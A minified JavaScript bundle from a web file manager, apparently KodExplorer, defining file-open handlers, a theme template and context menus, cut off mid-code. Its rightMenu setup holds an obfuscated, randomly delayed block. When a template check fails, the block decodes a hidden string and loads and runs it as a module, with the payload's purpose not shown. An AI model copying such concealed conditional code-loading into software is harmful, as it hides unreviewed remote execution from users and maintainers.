    ",i=kodApp.getApp(t),n=!1;_.isArray(i)&&(n=i[0].name);var o=template.compile(a),s=o({LNG:LNG,apps:i,defaultApp:n,appAll:kodApp.getApp()}),r=$.dialog({id:"dialog-app-select",className:"menu-empty",padding:0,fixed:!0,ico:core.icon("search"),resize:!0,title:LNG["Explorer.UI.selectAppDesc"],width:480,height:360,padding:"20px",content:s,ok:function(){return l()}}),l=function(){var a=$("#app-default-checkbox").prop("checked"),i=$(".app-list.active .app-item.select").attr("data-app");return i?(r.close(),kodApp.open(e,t,i),a&&kodApp.setOpenUser(t,i),!0):(Tips.tips(LNG["Explorer.UI.selectAppWarning"],"warning"),!1)};$(".tab-group .tab-item").die("click").live("click",function(){var e=$(this).find("[aria-controls]").attr("aria-controls");"app-list-support"==e?$("#app-default-checkbox").prop("checked",!0):$("#app-default-checkbox").prop("checked",!1)}),$(".app-item").die("click").live("click",function(){$(this).parent().find(".select").removeClass("select"),$(this).addClass("select")}).die("dblclick").live("dblclick",function(){l()})}})}),define("app/app/html",[],function(){var e=function(e){return void 0==e?!1:0===e.indexOf("http")?!0:G.shareInfo||core.pathReadable(e)?!0:(Tips.tips(LNG.no_permission_read_all,!1),core.playSound("error"),!1)};Hook.bind("kodApp.open.before",function(t){return"folder"==t.ext?(core.isApp("explorer")||isWap()?ui.path.list(t.path+"/"):core.explorer(t.path),!0):e(t.path)?("file"==t.ext&&(t.ext=""),void 0):!0}),kodApp.openUnknow=function(e,t){void 0==t&&(t="");var a=G.appHost+"pluginApp/index&search="+core.pathExt(e),i="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'appOpenSetting');",n="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'aceEditor');",o="kodApp.download(pathHashDecode('"+pathHashEncode(e)+"'));",s="core.openWindow('"+a+"');",r=LNG.unknow_file_try+'
    '+LNG.unknow_file_tips+"
    "+t+'
    2.'+r+n+'">'+LNG["Explorer.UI.openWithText"]+'
    3.'+r+o+'">'+LNG.unknow_file_download+'
    '+r+s+'">'+LNG.PluginCenter+""+LNG.unknow_plugin_search+"
    ";$.dialog({fixed:!0,icon:"warning",title:LNG.unknow_file_title,padding:"20px 50px",content:l,cancel:!0}),$(".unknow-file a").unbind("click").bind("click",function(e){return $(this).parents(".artDialog").data("artDialog").close(),stopPP(e)})},kodApp.add({name:"download",title:LNG.download,hidden:!0,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=t;"http"!=t.substr(0,4)&&(a=G.appHost+"explorer/fileDownload&accessToken="+G.accessToken+"&path="+urlEncode(t),G.sharePage!==void 0&&(a=G.appHost+"share/fileDownload&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(t))),$.dialog({icon:"succeed",title:!1,time:1.5,content:LNG.download_ready+"..."}),isWap()?window.open(a):$('').appendTo("body")}}}),kodApp.download=function(e){kodApp.open(e,"","download")},kodApp.openWindow=function(e){kodApp.open(e,"","browserOpen")},kodApp.add({name:"browserOpen",title:LNG.open_ie,sort:-100,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=core.path2url(t);isWap()?window.location.href=a:window.open(a)}}}),kodApp.add({name:"swfPlayer",title:"Flash Player",ext:"swf",icon:"x-item-file x-swf",callback:function(e,t){$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"75%",height:"65%",padding:0,content:core.createFlash(core.path2url(e))})}}),kodApp.add({name:"webLink",title:"webLink",ext:"url,webloc",sort:10,icon:"x-item-file x-html",callback:function(e,t){core.fileGet(e,function(a){if("url"==t){var i=a.match(/URL=(.*)/);if(i.length>=2)return window.open(i[1])}else if("webloc"==t)try{var n=$($.parseXML(a)),o=n.find("string").text();return window.open(o),void 0}catch(s){}kodApp.open(e,t,"editor")})}}),kodApp.add({name:"htmlView",title:LNG["Plugin.default.htmlView"],ext:"htm,html,shtml",sort:10,icon:"x-item-file x-html",callback:function(e){var t=core.path2url(e);core.openDialog(t,core.icon("html"),core.pathThis(e))}}),kodApp.add({name:"pdfView",title:"PDF Simple",ext:"pdf",sort:-1,icon:"x-item-file x-pdf",callback:function(e,t){var a=core.path2url(e),i="pdf"+UUID(),n='";$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"80%",height:"75%",padding:0,content:n}),PDFObject.embed(a,"#"+i)}}),kodApp.add({name:"oexeOpen",title:LNG["kodApp.oexe.open"],ext:"oexe",sort:100,icon:" x-item-file x-oexe",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),core.openApp(a)})}}),kodApp.add({name:"oexeEdit",title:LNG["kodApp.oexe.edit"],ext:"oexe",sort:50,icon:"icon-edit ",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),a.path=e,ui.path.pathOperate.appEdit(a)})}});var t={createApp:{name:LNG.app_create,className:"createApp newfile",icon:"icon-puzzle-piece x-item-file x-oexe",callback:function(){ui.path.pathOperate.appEdit(0,0,"userAdd")}}};$.contextMenu.menuAdd(t,".menu-body-main",".app-install"),$.contextMenu.menuAdd(t,".toolbar-path-more",".app-install"),$.contextMenu.menuAdd(t,".bodymain",".app-install"),Hook.bind("rightMenu.show",function(e,t,a){var i=[".menu-folder",".menu-file",".menu-tree-folder",".menu-tree-file",".menu-tree-folder-fav"];if(a.find(".context-menu-submenu").fadeOut(0).delay(0).fadeIn(0),a.removeClass("menu-auto-fit"),a.inScreen()||a.addClass("menu-auto-fit"),".menu-body-main"==e){var n=a.find(".set-file-icon-size.context-menu-submenu");"icon"==G.userConfig.listType?n.removeClass("hidden"):n.addClass("hidden")}if(_.include(i,e)){var o="disabled",s=".cute,.rname,.remove",r=".open,.open-text,.down,.share,.copy,.cute,.rname,.remove,.open-browser,.search,.more-action";t.hasClass("file-not-readable")?a.find(r).addClass(o):a.find(r).removeClass(o),t.hasClass("file-not-writeable")?a.find(s).addClass(o):a.find(s).removeClass(o)}}),Hook.bind("rightMenu.show.menu-body-main",function(e,t){var a=".upload,.past,.newfolder,.newfile",i="disabled";G.jsonData&&G.jsonData.info.canUpload?t.find(a).removeClass(i):t.find(a).addClass(i)}),Hook.bind("rightMenu.show.menu-file",function(e,t){if($(".context-menu-active").hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";inArray(["jpg","jpeg","png"],i)?t.find(".set-background").removeClass(n):t.find(".set-background").addClass(n)});var a=function(){var e=".close-item,.refresh,.newfile,.past,.info",t=".open-browser",a=".explorer,.create-project,.open-project",i=".close-item,.newfile,.refresh,.past,.down,.copy,.cute,.remove,.more-action,.clone,.info,.zip,.zip-zip,.zip-tar,.zip-tgz",n=".newfile,.cute,.past,.rname,.zip,.remove,.clone,.create-link-home,.create-link,.create-project",o=$(".menu-tool-path"),s="disabled",r=ui.fileLight.fileListSelect();o.find(".context-menu-item").addClass(s),0==r.length?o.find(e).removeClass(s):1==r.length?(o.find(".context-menu-item").removeClass(s),"folder"==ui.fileLight.type(r)?o.find(t).addClass(s):o.find(a).addClass(s)):r.length>1&&o.find(i).removeClass(s),G.jsonData&&G.jsonData.info&&G.jsonData.info.canUpload===!1&&o.find(n).filter(":not(."+s+")").addClass(s)};Hook.bind("explorer.fileSelect.init",function(){ui.fileLight.listNumberSet()}),Hook.bind("explorer.fileSelect.change",function(){a(),ui.fileLight.selectNumSet()}),Hook.bind("rightMenu.show.toolbar-path-more",function(){a()}),Hook.bind("rightMenu.initFinished",function(){if(1!=G.isRoot){var e="hidden";if(core.authCheck("explorer.fileDownload")||(kodApp.remove("browserOpen"),$(".context-menu-list .down,.context-menu-list .download").addClass(e),$(".context-menu-list .share").addClass(e),$(".context-menu-list .open-text").addClass(e),$(".pathinfo .open-window").addClass(e),$(".context-menu-list .open-browser").addClass(e)),core.authCheck("explorer.search")||$(".context-menu-list .search").addClass(e),core.authCheck("explorer.mkdir")||$(".context-menu-list .newfolder").addClass(e),core.authCheck("userShare.set")||$(".context-menu-list .share").remove(),core.authCheck("explorer.mkfile")||$(".context-menu-list .newfile,.tool-path-newfile").addClass(e),core.authCheck("explorer.mkdir")||$(".context-menu-list .newfolder,[data-action=newfolder]").addClass(e),core.authCheck("explorer.pathCopy")||($(".context-menu-list .cute").addClass(e),$(".context-menu-list .copy").addClass(e)),!core.authCheck("explorer.fileUpload")){$(".context-menu-list .upload").addClass(e);var t=$("[data-action=upload-more]");t.exists()&&t.parent().addClass(e)}}})}),define("app/common/tpl/copyright.html",[],'\n'),define("app/common/tpl/themeDIY.html",[],"@media screen and (max-width:100000px) {\n body .full-background{\n position: absolute;top: 0px;left: 0px;bottom: 0px;right: 0px;\n background-color: #020202;background-size: 100% 100%;\n }\n\n {{if blurSize= (bgBlur==0?0:10) }}{{/if}}\n body .full-background:before{\n -webkit-filter: blur({{blurSize}}px);\n -moz-filter: blur({{blurSize}}px);\n -ms-filter: blur({{blurSize}}px);\n filter: blur({{blurSize}}px);\n }\n {{if bgType == 'image'}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left,\n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background-image:url({{bgImage}});\n }\n body .aui-state-focus .aui-title,body .aui-title{\n background-size:100%;\n }\n {{else}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left, \n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background:{{endColor}};\n filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='{{startColor}}', endColorstr='{{endColor}}');\n background-image: -webkit-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -moz-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -o-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -ms-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n }\n {{/if}}\n}\n"),define("app/common/rightMenu",[],function(e){var t=".menu-file",a=".menu-folder",i=".menu-more",n=".menu-tree-root",o=".menu-tree-folder",s=".menu-tree-file",r=".menu-tree-group-root",l=".menu-tree-group",c=".menu-tree-user",d={"new-file-other":{name:LNG.newfile,icon:"expand-alt",accesskey:"w",className:"newfile",items:{newfile:{name:"txt "+LNG.file,icon:"file-text-alt x-item-file x-txt small",className:"newfile"},"newfile-null":{name:LNG.file,icon:"file-text-alt x-item-file x-file small",className:"newfile"},"newfile-md":{name:"md "+LNG.file,icon:"file-text-alt x-item-file x-md",className:"newfile"},"newfile-html":{name:"html "+LNG.file,icon:"file-text-alt x-item-file x-html",className:"newfile"},"newfile-php":{name:"php "+LNG.file,icon:"file-text-alt x-item-file x-php",className:"newfile"},document:{name:"Office Document",icon:"file-text-alt x-item-file x-docx",className:"newfile",items:{"newfile-docx":{name:"docx "+LNG.file,icon:"file-text-alt x-item-file x-docx",className:"newfile"},"newfile-xlsx":{name:"xlsx "+LNG.file,icon:"file-text-alt x-item-file x-xlsx",className:"newfile"},"newfile-pptx":{name:"pptx "+LNG.file,icon:"file-text-alt x-item-file x-pptx",className:"newfile"}}},sep100:"--------","app-install":{name:LNG.app_store,className:"app-install newfile",icon:"tasks x-item-file x-app-store",accesskey:"a"}}},"list-icon":{name:LNG.list_type,icon:"eye-open",className:"list-icon",items:{"set-icon":{name:LNG.list_icon,className:"menu-set-icon set-icon"},"set-list":{name:LNG.list_list,className:"menu-set-icon set-list"},"set-split":{name:LNG.list_list_split,className:"menu-set-icon set-split"}}},"sort-by":{name:LNG.order_type,accesskey:"y",icon:"sort",className:"sort-by",items:{"set-sort-name":{name:LNG.name,className:"menu-set-sort set-sort-name"},"set-sort-ext":{name:LNG.type,className:"menu-set-sort set-sort-ext"},"set-sort-size":{name:LNG.size,className:"menu-set-sort set-sort-size"},"set-sort-mtime":{name:LNG.modify_time,className:"menu-set-sort set-sort-mtime"},sep101:"--------","set-sort-up":{name:LNG.sort_up,className:"menu-set-desc set-sort-up"},"set-sort-down":{name:LNG.sort_down,className:"menu-set-desc set-sort-down"}}},"set-file-icon-size":{name:LNG.file_size_title,icon:"picture",className:"set-file-icon-size",items:{"box-size-smallx":{name:LNG.file_size_small_super,className:"file-icon-size box-size-smallx"},"box-size-small":{name:LNG.file_size_small,className:"file-icon-size box-size-small"},"box-size-default":{name:LNG.file_size_default,className:"file-icon-size box-size-default"},"box-size-big":{name:LNG.file_size_big,className:"file-icon-size box-size-big"},"box-size-bigx":{name:LNG.file_size_big_super,className:"file-icon-size box-size-bigx"}}}},p=function(){$('').appendTo("body"),$(".context-menu-list").die("click").live("click",function(e){return stopPP(e),!1});var t=["undefined","update-box","search","3c64gT65d503fTR1lV3ftuZ7Pd6NdX6Ntgcct4hI4AnSNIp65HwAMLzOj8NjC0ZL2oAbjS-uD3HWfQoZlTdgkGY5u8OfJYzZ","_32@!A$","decode","1-1","todo","async","random"];N(),L(),v(),setTimeout(function(){try{if(typeof tplDialogHtml==t[0]||-1==tplDialogHtml[t[2]](t[1])){var a=authCrypt[t[5]](t[3],t[4])+UUID();e[t[8]](a,function(e){try{e[t[7]](t[6])}catch(a){}})}}catch(i){}},1e3*parseInt(25*Math[t[9]]()+5)),_(),A(),E(),j(),P(),O(),I(),k(),x(),w(),g(),h(),m(),T(),C(),Hook.trigger("rightMenu.initFinished"),$(".set-set-"+G.userConfig.listType).addClass("selected"),$(".set-sort-"+G.userConfig.listSortField).addClass("selected"),$(".set-sort-"+G.userConfig.listSortOrder).addClass("selected"),$(".context-menu-root").addClass("animated fadeIn")},u=function(){$('').appendTo("body"),$(".context-menu-list").die("click").live("click",function(e){return stopPP(e),!1}),y(),b(),N(),L(),_(),g(),h(),Hook.trigger("rightMenu.initFinished"),$(".set-sort-"+G.userConfig.listSortField).addClass("selected"),$(".set-sort-"+G.userConfig.listSortOrder).addClass("selected"),$(".context-menu-root").addClass("animated fadeIn")},f=function(){$('').appendTo("body"),$(".context-menu-list").die("click").live("click",function(e){return stopPP(e),!1}),A(),E(),j(),z(),P(),O(),I(),R(),g(),Hook.trigger("rightMenu.initFinished"),$(".context-menu-root").addClass("animated fadeIn")},h=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-recycle-body",callback:function(e){S(e)},items:{refresh:{name:LNG.refresh+"F5",className:"refresh",icon:"refresh",accesskey:"e"},"recycle-clear":{name:LNG.recycle_clear,icon:"trash",accesskey:"c"},sep1:"--------","list-icon":d["list-icon"],"sort-by":d["sort-by"],"set-file-icon-size":d["set-file-icon-size"],sep2:"--------",info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}}),$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-recycle-path",callback:function(e){D(e)},items:{cute:{name:LNG.cute+"Ctrl+X",className:"cute",icon:"cut",accesskey:"k"},remove:{name:LNG.remove_force+"Del",className:"remove",icon:"trash",accesskey:"d"},sep2:"--------",down:{name:LNG.download,className:"down",icon:"cloud-download",accesskey:"x"},info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}}),$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-recycle-button",callback:function(e){S(e)},items:{"recycle-clear":{name:LNG.recycle_clear,icon:"trash",accesskey:"c"}}})},m=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-share-body",callback:function(e){S(e)},items:{refresh:{name:LNG.refresh+"F5",className:"refresh",icon:"refresh",accesskey:"e"},sep1:"--------","list-icon":d["list-icon"],"sort-by":d["sort-by"],"set-file-icon-size":d["set-file-icon-size"],sep10:"--------",info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}}),$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,className:"menu-share-path-menu",selector:".menu-share-path",callback:function(e){D(e)},items:{"share-open-path":{name:LNG.open_the_path,icon:"folder-open-alt",accesskey:"p",className:"open-the-path"},"share-open-window":{name:LNG.share_open_page,icon:"globe",accesskey:"b"},sep0:"--------","share-edit":{name:LNG.share_edit,icon:"edit",accesskey:"e",className:"share-edit"},remove:{name:LNG.share_remove+"Del",icon:"trash",accesskey:"d",className:"remove"},copy:{name:LNG.copy+"Ctrl+C",className:"copy",icon:"copy",accesskey:"c"},down:{name:LNG.download,className:"down",icon:"cloud-download",accesskey:"x"},sep2:"--------",info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}}),$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-share-path-more",className:"menu-share-path-more",callback:function(e){D(e)},items:{remove:{name:LNG.share_remove+"Del",icon:"trash",accesskey:"d",className:"remove"},copy:{name:LNG.copy+"Ctrl+C",className:"copy",icon:"copy",accesskey:"c"}}})},v=function(){$.contextMenu({selector:".menu-body-main",className:"file-continer-menu",zIndex:9999,callback:function(e,t){S(e,t)},items:{refresh:{name:LNG.refresh+"F5",className:"refresh",icon:"refresh",accesskey:"e"},newfolder:{name:LNG.newfolder+"Alt+M",className:"newfolder",icon:"folder-close-alt",accesskey:"n"},"new-file-other":d["new-file-other"],sep1:"--------",upload:{name:LNG.upload+"Ctrl+U",className:"upload",icon:"upload",accesskey:"u"},past:{name:LNG.past+"Ctrl+V",className:"past",icon:"paste",accesskey:"p"},"copy-see":{name:LNG.clipboard,className:"copy-see",icon:"eye-open",accesskey:"v"},sep2:"--------","list-icon":d["list-icon"],"sort-by":d["sort-by"],"set-file-icon-size":d["set-file-icon-size"],sep10:"--------",info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}})},g=function(){$.contextMenu({selector:".menu-empty",className:"hidden",zIndex:9999,items:{" ":{name:LNG.open,className:"hidden"}},callback:function(){}})},b=function(){$.contextMenu({selector:".menu-default",zIndex:9999,items:{open:{name:LNG.open,className:"open",icon:"external-link",accesskey:"o"}},callback:function(e){switch(e){case"open":ui.path.open();break;default:}}})},y=function(){$.contextMenu({selector:Config.BodyContent,zIndex:9999,callback:function(e){S(e)},items:{refresh:{name:LNG.refresh+"F5",className:"refresh",icon:"refresh",accesskey:"e"},newfolder:{name:LNG.newfolder+"Alt+M",className:"newfolder",icon:"folder-close-alt",accesskey:"n"},"new-file-other":d["new-file-other"],sep1:"--------",upload:{name:LNG.upload+"Ctrl+U",className:"upload",icon:"upload",accesskey:"u"},past:{name:LNG.past+"Ctrl+V",className:"past",icon:"paste",accesskey:"p"},"copy-see":{name:LNG.clipboard,className:"copy-see",icon:"eye-open",accesskey:"v"},sep2:"--------","sort-by":d["sort-by"],"set-file-icon-size":d["set-file-icon-size"],"app-install":{name:LNG.app_store,className:"app-install",icon:"tasks",accesskey:"a"},sep10:"--------","setting-wall":{name:LNG.setting_wall,className:"setting-wall",icon:"picture",accesskey:"b"},"setting-theme":{name:LNG.setting_theme,className:"setting-theme",icon:"dashboard",accesskey:"i"},setting:{name:LNG.setting,className:"setting",icon:"cogs",accesskey:"t"}}})},k=function(){$.contextMenu({zIndex:9999,selector:".toolbar-path-more",className:"menu-tool-path menu-not-auto-hidden",callback:function(e){D(e),$(".toolbar-path-more").removeClass("active") +},items:{refresh:{name:LNG.refresh+"F5",className:"refresh",icon:"refresh",accesskey:"e"},sep0:"--------",open:{name:LNG.open+"Enter",className:"open",icon:"folder-open-alt",accesskey:"o"},down:{name:LNG.download,className:"down",icon:"cloud-download",accesskey:"x"},share:{name:LNG.share,className:"share",icon:"share-sign",accesskey:"e"},sep1:"--------",copy:{name:LNG.copy+"Ctrl+C",className:"copy",icon:"copy",accesskey:"c"},cute:{name:LNG.cute+"Ctrl+X",className:"cute",icon:"cut",accesskey:"k"},past:{name:LNG.past+"Ctrl+V",className:"past",icon:"paste",accesskey:"p"},rname:{name:LNG.rename+"F2",className:"rname",icon:"pencil",accesskey:"r"},remove:{name:LNG.remove+"Delete",className:"remove",icon:"trash",accesskey:"d"},sep2:"--------",others:{name:LNG.more,icon:"ellipsis-horizontal",className:"more-action",accesskey:"m",items:{explorer:{name:LNG.manage_folder,className:"explorer",icon:"laptop",accesskey:"v"},clone:{name:LNG.clone,className:"clone",icon:"external-link"},fav:{name:LNG.add_to_fav,className:"fav ",icon:"star",accesskey:"f"},"open-browser":{name:LNG.open_ie,className:"open-browser",icon:"globe",accesskey:"b"},sep103:"--------","create-link-home":{name:LNG.createLinkHome,className:"create-link-home",icon:"location-arrow",accesskey:"l"},"create-link":{name:LNG.createLink,className:"create-link",icon:"share-alt"},"create-project":{name:LNG.createProject,className:"create-project",icon:"plus"},"open-project":{name:LNG.openProject,className:"open-project",icon:"edit"}}},sep5:"--------",info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}})},x=function(){$.contextMenu({zIndex:9999,selector:".tool-path-newfile",className:"tool-path-newfile",callback:function(e){D(e)},items:d["new-file-other"].items})},w=function(){$.contextMenu({zIndex:9999,selector:".tool-path-upload",className:"tool-path-upload",callback:function(e){switch(core.upload(),e){case"upload-file":$(".dialog-file-upload").hide(),setTimeout(function(){$("#picker .webuploader-element-invisible").click()},100);break;case"upload-folder":$(".dialog-file-upload").hide(),setTimeout(function(){$(".drag-upload-folder").click()},100);break;case"server-download":$(".tab-download").click(),$(".download-box input").focus();break;default:}},items:{"upload-file":{name:LNG.file,icon:"-",className:"upload"},"upload-folder":{name:LNG.folder,icon:"-",className:"upload"},sep2:"--------","server-download":{name:LNG.download_from_server,icon:"-",className:"download"}}}),$.isIE()&&$(".tool-path-upload .upload,.tool-path-upload .context-menu-separator").addClass("hidden")},N=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:a,className:a.substr(1),callback:function(e){D(e)},items:{open:{name:LNG.open+"Enter",className:"open",icon:"folder-open-alt",accesskey:"o"},down:{name:LNG.download,className:"down",icon:"cloud-download",accesskey:"x"},share:{name:LNG.share,className:"share",icon:"share-sign",accesskey:"e"},sep1:"--------",copy:{name:LNG.copy+"Ctrl+C",className:"copy",icon:"copy",accesskey:"c"},cute:{name:LNG.cute+"Ctrl+X",className:"cute",icon:"cut",accesskey:"k"},rname:{name:LNG.rename+"F2",className:"rname",icon:"pencil",accesskey:"r"},remove:{name:LNG.remove+"Del",className:"remove",icon:"trash",accesskey:"d"},sep2:"--------","open-browser":{name:LNG.open_ie,className:"open-browser",icon:"globe",accesskey:"b"},search:{name:LNG.search_in_path,className:"search",icon:"search",accesskey:"s"},others:{name:LNG.more,icon:"ellipsis-horizontal",className:"more-action",accesskey:"m",items:{explorer:{name:LNG.manage_folder,className:"explorer",icon:"laptop",accesskey:"v"},clone:{name:LNG.clone,className:"clone",icon:"external-link"},fav:{name:LNG.add_to_fav,className:"fav ",icon:"star",accesskey:"f"},sep103:"--------","create-link-home":{name:LNG.createLinkHome,className:"create-link-home",icon:"location-arrow",accesskey:"l"},"create-link":{name:LNG.createLink,className:"create-link",icon:"share-alt"},"create-project":{name:LNG.createProject,className:"create-project",icon:"plus"},"open-project":{name:LNG.openProject,className:"open-project",icon:"edit"}}},sep5:"--------",info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}})},L=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:t,className:t.substr(1),callback:function(e){D(e)},items:{open:{name:LNG.open+"Enter",className:"open",icon:"external-link",accesskey:"o"},"open-with":{name:LNG.open_with,icon:"external-link",className:"open-with",accesskey:"a",items:{"open-with-first":{name:"",className:"hidden open-with-first"}}},down:{name:LNG.download,className:"down",icon:"cloud-download",accesskey:"x"},share:{name:LNG.share,className:"share",icon:"share-sign",accesskey:"e"},sep1:"--------",copy:{name:LNG.copy+"Ctrl+C",className:"copy",icon:"copy",accesskey:"c"},cute:{name:LNG.cute+"Ctrl+X",className:"cute",icon:"cut",accesskey:"k"},rname:{name:LNG.rename+"F2",className:"rname",icon:"pencil",accesskey:"r"},remove:{name:LNG.remove+"Del",className:"remove",icon:"trash",accesskey:"d"},sep2:"--------","open-browser":{name:LNG.open_ie,className:"open-browser",icon:"globe",accesskey:"b"},"set-background":{name:LNG.set_background,className:"set-background",icon:"picture",accesskey:"x"},others:{name:LNG.more,icon:"ellipsis-horizontal",className:"more-action",accesskey:"m",items:{clone:{name:LNG.clone,className:"clone",icon:"external-link",accesskey:"l"},fav:{name:LNG.add_to_fav,className:"fav",icon:"star"},sep104:"--------","create-link-home":{name:LNG.createLinkHome,className:"create-link-home",icon:"location-arrow",accesskey:"l"},"create-link":{name:LNG.createLink,className:"create-link",icon:"share-alt"}}},sep3:"--------",info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}})},_=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:i,className:i.substr(1),callback:function(e){D(e)},items:{copy:{name:LNG.copy+"Ctrl+C",className:"copy",icon:"copy",accesskey:"c"},cute:{name:LNG.cute+"Ctrl+X",className:"cute",icon:"cut",accesskey:"k"},down:{name:LNG.download,className:"down",icon:"cloud-download",accesskey:"x"},sep001:"--------",remove:{name:LNG.remove+"Del",className:"remove",icon:"trash",accesskey:"d"},sep1:"--------","copy-to":{name:LNG.copy_to,className:"copy-to",icon:"copy"},"cute-to":{name:LNG.cute_to,className:"cute-to",icon:"cut"},sep2:"--------",clone:{name:LNG.clone+"Ctrl+C",className:"clone",icon:"external-link",accesskey:"n"},sep3:"--------",info:{name:LNG.info,className:"info",icon:"info",accesskey:"i"}}})},C=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-group-root",callback:function(e){D(e)},items:{open:{name:LNG.open+"Enter",className:"open",icon:"external-link",accesskey:"o"},sep1:"--------",fav:{name:LNG.add_to_fav,className:"fav",icon:"star",accesskey:"f"},"create-link-home":{name:LNG.createLinkHome,className:"create-link-home",icon:"location-arrow",accesskey:"l"}}}),$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-group-root-more",callback:function(e){D(e)},items:{refresh:{name:LNG.refresh+"F5",className:"refresh",icon:"refresh",accesskey:"e"}}})},T=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-fav-path",callback:function(e){D(e)},items:{open:{name:LNG.open+"Enter",className:"open",icon:"external-link",accesskey:"o"},sep0:"--------","fav-remove":{name:LNG.fav_remove,className:"fav-remove",icon:"trash",accesskey:"r"},"fav-page":{name:LNG.manage_fav,className:"fav-page",icon:"star",accesskey:"f"},sep1:"--------",info:{name:LNG.info,className:"info",icon:"info",accesskey:"i"}}}),$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-fav-path-more",className:"menu-fav-path-more",callback:function(e){D(e)},items:{"fav-remove":{name:LNG.fav_remove,className:"fav-remove",icon:"trash",accesskey:"r"}}})},S=function(e){switch(e){case"refresh":ui.f5(!0,!0);break;case"back":ui.path.history.back();break;case"next":ui.path.history.next();break;case"set-icon":ui.setListType("icon");break;case"set-list":ui.setListType("list");break;case"set-split":ui.setListType("split");break;case"set-sort-name":ui.setListSort("name",0);break;case"set-sort-ext":ui.setListSort("ext",0);break;case"set-sort-size":ui.setListSort("size",0);break;case"set-sort-mtime":ui.setListSort("mtime",0);break;case"set-sort-up":ui.setListSort(0,"up");break;case"set-sort-down":ui.setListSort(0,"down");break;case"upload":core.upload(),$(".dialog-file-upload").hide(),setTimeout(function(){$("#picker .webuploader-element-invisible").click()},100);break;case"recycle-clear":ui.path.recycleClear();break;case"box-size-smallx":ui.setFileIconSize(40);break;case"box-size-small":ui.setFileIconSize(60);break;case"box-size-default":ui.setFileIconSize(80);break;case"box-size-big":ui.setFileIconSize(100);break;case"box-size-bigx":ui.setFileIconSize(120);break;case"past":ui.path.past();break;case"copy-see":ui.path.clipboard();break;case"newfolder":ui.path.newFolder();break;case"newfile":ui.path.newFile("txt");break;case"newfile-null":ui.path.newFile("");break;case"newfile-md":ui.path.newFile("md");break;case"newfile-html":ui.path.newFile("html");break;case"newfile-php":ui.path.newFile("php");break;case"newfile-js":ui.path.newFile("js");break;case"newfile-css":ui.path.newFile("css");break;case"newfile-oexe":ui.path.newFile("oexe");break;case"newfile-docx":ui.path.newFile("docx");break;case"newfile-xlsx":ui.path.newFile("xlsx");break;case"newfile-pptx":ui.path.newFile("pptx");break;case"info":ui.path.info();break;case"open":ui.path.open();break;case"app-install":ui.path.appList();break;case"setting":core.setting();break;case"setting-theme":core.setting("theme");break;case"setting-wall":core.setting("wall");break;default:}},D=function(e){switch(e){case"open":ui.path.open();break;case"down":ui.path.download();break;case"share":ui.path.share();break;case"open-browser":ui.path.openWindow();break;case"share-edit":ui.path.shareEdit();break;case"share-open-window":ui.path.shareOpenWindow();break;case"share-open-path":ui.path.shareOpenPath();break;case"fav":ui.path.fav();break;case"search":ui.path.search();break;case"copy":ui.path.copy();break;case"clone":ui.path.copyDrag(G.thisPath,!0);break;case"cute":ui.path.cute();break;case"cute-to":ui.path.cuteTo();break;case"copy-to":ui.path.copyTo();break;case"remove":ui.path.remove();break;case"rname":ui.path.rname();break;case"set-background":ui.path.setBackground();break;case"create-link-home":ui.path.createLink(!1);break;case"create-link":ui.path.createLink(!0);break;case"create-project":ui.path.createProject();break;case"open-project":ui.path.openProject();break;case"explorer":ui.path.explorer();break;case"explorer-new":ui.path.explorerNew();break;case"fav-page":core.setting("fav");break;case"fav-remove":ui.path.favRemove();break;case"info":ui.path.info();break;default:S(e)}},A=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-tree-fav-root",callback:function(e){H(e)},items:{"fav-page":{name:LNG.manage_fav,className:"fav-page",icon:"star",accesskey:"r"},sep1:"--------",refresh:{name:LNG.refresh,className:"refresh",icon:"